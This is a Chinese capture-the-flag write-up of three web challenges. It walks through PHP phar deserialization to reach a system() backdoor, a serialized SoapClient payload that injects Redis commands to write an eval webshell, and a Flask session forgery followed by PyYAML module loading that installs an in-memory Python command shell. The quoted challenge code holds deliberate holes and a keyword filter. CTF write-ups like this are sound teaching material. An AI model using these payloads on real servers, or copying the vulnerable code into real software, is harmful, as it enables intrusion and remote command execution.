hade_waibo
这道题学到了新手法
首先,进去之后有个登入框,可以用任意的用户名登入,之后有文件上传功能
在之后有个搜索文件的功能,还有个文件删除功能,这里的文件搜索可以任意文件读取
这里我们读取到源码
class.php
<?php
class User
{
public $username;
public function __construct($username){
$this->username = $username;
$_SESSION['isLogin'] = True;
$_SESSION['username'] = $username;
}
public function __wakeup(){
$cklen = strlen($_SESSION["username"]);
if ($cklen != 0 and $cklen <= 6) {
$this->username = $_SESSION["username"];
}
}
public function __destruct(){
if ($this->username == '') {
session_destroy();
}
}
}
class File
{
#更新黑名单为白名单,更加的安全
public $white = array("jpg","png");
public function show($filename){
echo '<div class="ui action input"><input type="text" id="filename" placeholder="Search..."><button class="ui button" onclick="window.location.href=\'file.php?m=show&filename=\'+document.getElementById(\'filename\').value">Search</button></div><p>';
if(empty($filename)){die();}
return '<img src="data:image/png;base64,'.base64_encode(file_get_contents($filename)).'" />';
}
public function upload($type){
$filename = "dasctf".md5(time().$_FILES["file"]["name"]).".$type";
move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $filename);
return "Upload success! Path: upload/" . $filename;
}
public function rmfile(){
system('rm -rf /var/www/html/upload/*');
}
public function check($type){
if (!in_array($type,$this->white)){
return false;
}
return true;
}
}
#更新了一个恶意又有趣的Test类
class Test
{
public $value;
public function __destruct(){
chdir('./upload');
$this->backdoor();
}
public function __wakeup(){
$this->value = "Don't make dream.Wake up plz!";
}
public function __toString(){
$file = substr($_GET['file'],0,3);
file_put_contents($file, "Hack by $file !");
return 'Unreachable! :)';
}
public function backdoor(){
if(preg_match('/[A-Za-z0-9?$@]+/', $this->value)){
$this->value = 'nono~';
}
system($this->value);
}
}这个一眼就是文件上传phar文件,最后用phar伪协议进行文件读取
我们看一下这个Test类,这里面是有个后门可以任意命令执行
触发条件也很简单
只需要实例化这个对象就可以了
但是这里面的value给我们写死了,这里是个高版本的php,我们无法用那个cve绕过,只能用引用绕过了,之后就是面对的是,一个无字母
数字RCE,这里很难利用
非预期解法
非预期解法就很简单了,直接任意文件读取读/start.sh就可以了
这里解码一下
#!/bin/sh
echo $FLAG > /ghjsdk_F149_H3re_asdasfc
export FLAG=no_flag
FLAG=no_flag
apache2-foreground
rm -rf /flag.sh
tail -f /dev/null这里可以看见这个目录,直接读取
解码得到flag
预期解
预期解还是利用这个phar伪协议
具体利用,我们可以上传一个bash脚本,然后执行这个脚本,就可以了
具体就是上面的
这样的话我们要先上传一个bash脚本,然后脚本的内容是我们想要执行的命令,之后我们在用phar文件来执行我们的. ./*命令
这里的Test下面的value被写死了,我们要引用一个参数,这个参数我们可控的,全场我们可控的参数只有我们的用户名了
这里,我们就将我们的value引用至username,让username等于. ./*
差不多就是这个意思
<?php
class User
{
public $username;
}
class Test
{
public $value;
}
$A = new User();
$B = new Test();
$A ->username = new Test();
$A -> aa = $B;
$B ->value = &$A ->username;
$phar = new Phar("abcd.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($A);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
?>最后生成phar文件之后再压缩一下后缀改为png就可以了
import gzip
with open('poc.phar', 'rb') as file:
f = file.read()
newf = gzip.compress(f) # 对Phar文件进行gzip压缩
with open('poc.png', 'wb') as file: # 更改文件后缀
file.write(newf)上传之后再修改一下用户名字为 . ./*
最后用伪协议读取文件就可以了
环境太差没法复现了
EasyLove
进去是源码
<?php
highlight_file(__FILE__);
error_reporting(0);
class swpu{
public $wllm;
public $arsenetang;
public $l61q4cheng;
public $love;
public function __construct($wllm,$arsenetang,$l61q4cheng,$love){
$this->wllm = $wllm;
$this->arsenetang = $arsenetang;
$this->l61q4cheng = $l61q4cheng;
$this->love = $love;
}
public function newnewnew(){
$this->love = new $this->wllm($this->arsenetang,$this->l61q4cheng);
}
public function flag(){
$this->love->getflag();
}
public function __destruct(){
$this->newnewnew();
$this->flag();
}
}
class hint{
public $hint;
public function __destruct(){
echo file_get_contents($this-> hint.'hint.php');
}
}
$hello = $_GET['hello'];
$world = unserialize($hello); 进去是源码,这个源码很简单,下面有一个hint.php
我们可以先看一下hint.php,这里我用php伪协议读取,这里的路径要用绝对路径
<?php
class hint
{
public $hint = 'php://filter/read=convert.base64-encode/resource=/var/www/html/';
}
$a = new hint();
echo serialize($a);然后打出来提示,base64解码之后
<?php
$hint = "My favorite database is Redis and My favorite day is 20220311";
?>这里肯定是Redis数据库的密码了。
我们再次审计一下,这个swpu类
这里如果调用一个不存在的方法就会触发__call方法,打内网最好用的就是SoapClient 类
这里就用这个SoapClient 打redis
SoapClient类需要两个参数,第一个参数通常指明是否是wsdl模式,我们构造的时候通常为Null,第二个参数是个数组,在非wsdl模式下,必须设置location和uri选项,其他可选。我们可以通过uri选项向内网redis发指令写木马。
AUTH 20220311 //验证客户端链接
CONFIG SET dir /var/www/html //设置写入的目录
SET x '<?@eval(\$_POST[1]);?>' //设置写入的内容
CONFIG SET dbfilename cmd.php //设置写入的文件名
SAVE //保存结束直接给exp
<?php
$target = "http://127.0.0.1:6379";
$option = array("location"=>$target,"uri"=>"hello\r\nAUTH 20220311\r\nCONFIG SET dir /var/www/html\r\nSET x '<?@eval(\$_POST[1]);?>'\r\nCONFIG SET dbfilename cmd.php\r\nSAVE\r\nhello");
class swpu{
public $wllm;
public $arsenetang;
public $l61q4cheng;
public $love;
public function __construct()
{
$this->wllm = "SoapClient";
$this->arsenetang = Null;
}
}
$aa = new swpu();
$aa->l61q4cheng = $option;
echo urlencode(serialize($aa));
?> 
最后成功写入,用蚁剑连接,读取flag没有权限
使用date命令将flag给带出来
BlogSystem
这道题确实学到了很多知识点,包括PyYAML反序列化和Python内存🐎
首先进去有一个注册的功能,我们尝试注册admin,发现这个admin已经被注册过了,那我们随便注册一下
登入成功之后这是普通用户的页面
抓包之后,发现这里有个session,那大概率是jwt伪造了,我们尝试找一下这个key值
这下面有几篇文章,我们找一下看看有没有什么线索
在flask基础总结这里找到了这个key的值
我们尝试伪造一下admin
这是我们的session
伪造session
我们传入这个值
传入成功之后,我们再次看一下页面
发现多了一个东西,我们点进去
这里存在任意文件读取
一眼MVC,我们试着读取app/view/index.py和app/view/blog.py
index.py
from flask import Blueprint, session, render_template, request, flash, redirect, url_for, Response, send_file
from werkzeug.security import check_password_hash
from decorators import login_limit, admin_limit
from model import *
import os
index = Blueprint("index", __name__)
@index.route('/')
def hello():
return render_template('index.html')
@index.route('/register', methods=['POST', 'GET'])
def register():
if request.method == 'GET':
return render_template('register.html')
if request.method == 'POST':
name = request.form.get('name')
username = request.form.get('username')
password = request.form.get('password')
user = User.query.filter(User.username == username).first()
if user is not None:
flash("该用户名已存在")
return render_template('register.html')
else:
user = User(username=username, name=name)
user.password_hash(password)
db.session.add(user)
db.session.commit()
flash("注册成功!")
return render_template('register.html')
@index.route('/login', methods=['POST', 'GET'])
def login():
if request.method == 'GET':
return render_template('login.html')
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
user = User.query.filter(User.username == username).first()
if (user is not None) and (check_password_hash(user.password, password)):
session['username'] = user.username
session.permanent = True
return redirect(url_for('index.hello'))
else:
flash("账号或密码错误")
return render_template('login.html')
@index.route("/updatePwd", methods=['POST', 'GET'])
@login_limit
def update():
if request.method == "GET":
return render_template("updatePwd.html")
if request.method == 'POST':
lodPwd = request.form.get("lodPwd")
newPwd1 = request.form.get("newPwd1")
newPwd2 = request.form.get("newPwd2")
username = session.get("username")
user = User.query.filter(User.username == username).first()
if check_password_hash(user.password, lodPwd):
if newPwd1 != newPwd2:
flash("两次新密码不一致!")
return render_template("updatePwd.html")
else:
user.password_hash(newPwd2)
db.session.commit()
flash("修改成功!")
return render_template("updatePwd.html")
else:
flash("原密码错误!")
return render_template("updatePwd.html")
@index.route('/download', methods=['GET'])
@admin_limit
def download():
if request.args.get('path'):
path = request.args.get('path').replace('..', '').replace('//', '')
path = os.path.join('static/upload/', path)
if os.path.exists(path):
return send_file(path)
else:
return render_template('404.html', file=path)
return render_template('sayings.html',
yaml='所谓『恶』,是那些只为了自己,利用和践踏弱者的家伙!但是,我虽然是这样,也知道什么是令人作呕的『恶』,所以,由我来制裁!')
@index.route('/logout')
def logout():
session.clear()
return redirect(url_for('index.hello'))blog.py
import os
import random
import re
import time
import yaml
from flask import Blueprint, render_template, request, session
from yaml import Loader
from decorators import login_limit, admin_limit
from model import *
blog = Blueprint("blog", __name__, url_prefix="/blog")
def waf(data):
if re.search(r'apply|process|eval|os|tuple|popen|frozenset|bytes|type|staticmethod|\(|\)', str(data), re.M | re.I):
return False
else:
return True
@blog.route('/writeBlog', methods=['POST', 'GET'])
@login_limit
def writeblog():
if request.method == 'GET':
return render_template('writeBlog.html')
if request.method == 'POST':
title = request.form.get("title")
text = request.form.get("text")
username = session.get('username')
create_time = time.strftime("%Y-%m-%d %H:%M:%S")
user = User.query.filter(User.username == username).first()
blog = Blog(title=title, text=text, create_time=create_time, user_id=user.id)
db.session.add(blog)
db.session.commit()
blog = Blog.query.filter(Blog.create_time == create_time).first()
return render_template('blogSuccess.html', title=title, id=blog.id)
@blog.route('/imgUpload', methods=['POST'])
@login_limit
def imgUpload():
try:
file = request.files.get('editormd-image-file')
fileName = file.filename.replace('..','')
filePath = os.path.join("static/upload/", fileName)
file.save(filePath)
return {
'success': 1,
'message': '上传成功!',
'url': "/" + filePath
}
except Exception as e:
return {
'success': 0,
'message': '上传失败'
}
@blog.route('/showBlog/<id>')
def showBlog(id):
blog = Blog.query.filter(Blog.id == id).first()
comment = Comment.query.filter(Comment.blog_id == blog.id)
return render_template("showBlog.html", blog=blog, comment=comment)
@blog.route("/blogAll")
def blogAll():
blogList = Blog.query.order_by(Blog.create_time.desc()).all()
return render_template('blogAll.html', blogList=blogList)
@blog.route("/update/<id>", methods=['POST', 'GET'])
@login_limit
def update(id):
if request.method == 'GET':
blog = Blog.query.filter(Blog.id == id).first()
return render_template('updateBlog.html', blog=blog)
if request.method == 'POST':
id = request.form.get("id")
title = request.form.get("title")
text = request.form.get("text")
blog = Blog.query.filter(Blog.id == id).first()
blog.title = title
blog.text = text
db.session.commit()
return render_template('blogSuccess.html', title=title, id=id)
@blog.route("/delete/<id>")
@login_limit
def delete(id):
blog = Blog.query.filter(Blog.id == id).first()
db.session.delete(blog)
db.session.commit()
return {
'state': True,
'msg': "删除成功!"
}
@blog.route("/myBlog")
@login_limit
def myBlog():
username = session.get('username')
user = User.query.filter(User.username == username).first()
blogList = Blog.query.filter(Blog.user_id == user.id).order_by(Blog.create_time.desc()).all()
return render_template("myBlog.html", blogList=blogList)
@blog.route("/comment", methods=['POST'])
@login_limit
def comment():
text = request.values.get('text')
blogId = request.values.get('blogId')
username = session.get('username')
create_time = time.strftime("%Y-%m-%d %H:%M:%S")
user = User.query.filter(User.username == username).first()
comment = Comment(text=text, create_time=create_time, blog_id=blogId, user_id=user.id)
db.session.add(comment)
db.session.commit()
return {
'success': True,
'message': '评论成功!',
}
@blog.route('/myComment')
@login_limit
def myComment():
username = session.get('username')
user = User.query.filter(User.username == username).first()
commentList = Comment.query.filter(Comment.user_id == user.id).order_by(Comment.create_time.desc()).all()
return render_template("myComment.html", commentList=commentList)
@blog.route('/deleteCom/<id>')
def deleteCom(id):
com = Comment.query.filter(Comment.id == id).first()
db.session.delete(com)
db.session.commit()
return {
'state': True,
'msg': "删除成功!"
}
@blog.route('/saying', methods=['GET'])
@admin_limit
def Saying():
if request.args.get('path'):
file = request.args.get('path').replace('../', 'hack').replace('..\\', 'hack')
try:
with open(file, 'rb') as f:
f = f.read()
if waf(f):
print(yaml.load(f, Loader=Loader))
return render_template('sayings.html', yaml='鲁迅说:当你看到这句话时,还没有拿到flag,那就赶紧重开环境吧')
else:
return render_template('sayings.html', yaml='鲁迅说:你说得不对')
except Exception as e:
return render_template('sayings.html', yaml='鲁迅说:'+str(e))
else:
with open('view/jojo.yaml', 'r', encoding='utf-8') as f:
sayings = yaml.load(f, Loader=Loader)
saying = random.choice(sayings)
return render_template('sayings.html', yaml=saying)这里就给出关键的代码
这里会反序列化我们传入的东西
很明显是考反序列化(PyYAML),但是上面有waf,把我们进行反序列化的字符串进行了过滤
参考这篇文章https://www.tr0y.wang/2022/06/06/SecMap-unserialize-pyyaml/
def waf(data):
if re.search(r'apply|process|eval|os|tuple|popen|frozenset|bytes|type|staticmethod|\(|\)', str(data), re.M | re.I):
return False
else:
return True
这里这个关键方法我们只能用module,但是我们传入的脚本在upload这个目录下,我们引入模板的话,就要进行目录穿越,
在不进行目录穿越的情况下,我们可以传入__init__.py,这样直接导入uploud就可以自己加载__init__.py这个文件里面的内容了
我们在这里选择传入python内存马
init.py
url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})poc.yaml
!!python/module:static.upload上传上去访问shell,参数是shell就可以命令执行了
上传路由,这是在writeBlog可以上传
@blog.route('/imgUpload', methods=['POST'])
@login_limit
def imgUpload():
try:
file = request.files.get('editormd-image-file')
fileName = file.filename.replace('..','')
filePath = os.path.join("static/upload/", fileName)
file.save(filePath)
return {
'success': 1,
'message': '上传成功!',
'url': "/" + filePath
}
except Exception as e:
return {
'success': 0,
'message': '上传失败'
}
传入完poc.yaml时,在blog/saying传入路径加载这个pocy.aml
最后访问shell参数是shell就可以命令执行了
